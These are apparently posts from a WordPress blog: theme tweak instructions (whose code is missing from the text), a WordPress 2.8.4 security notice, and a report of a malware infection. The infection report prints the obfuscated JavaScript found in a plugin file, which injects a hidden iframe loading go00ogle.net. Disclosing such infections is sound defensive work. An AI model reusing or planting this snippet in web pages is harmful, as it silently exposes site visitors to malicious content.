For some time now, comments have been disabled on pages in K2 and Unwakeable. The modifications needed to allow comments on pages are extremely easy to make. If you use either of these themes and wish to enable comments on pages, please continue reading.
1. Open the page.php file located in your K2 or Unwakeable theme directory. Go to line 36, it should look like this:
2. Comment out that if statement, so it should look like this when you’re done:
3. You’re halfway done at this point. Now go to line 40, which should look like this:
4. Comment out this piece of code as well, so modify line 40 so it looks like the code below.
5. Save the page.php file and you should be all set.
I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.
WordPress 2.8.4 has been released. It’s a security release, which means you should upgrade immediately. This version fixes a problem that could allow remote users to reset the administrative password. Below is a summary from the WordPress development blog:
Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.
So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.
